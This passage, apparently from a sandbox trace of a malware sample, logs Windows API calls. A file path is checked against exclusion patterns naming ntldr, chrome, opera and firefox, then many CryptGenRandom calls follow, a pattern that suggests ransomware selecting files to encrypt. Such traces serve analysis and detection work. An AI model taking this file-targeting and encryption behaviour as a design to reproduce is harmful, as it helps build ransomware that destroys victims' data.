returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*ntldr*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*chrome*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*opera*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*firefox*") returned 0 [0143.431] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ClientCapabilities.json", pszSpec="*") returned 1 [0143.431] strlen (_Str="NMoreira") returned 0x8 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.434] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 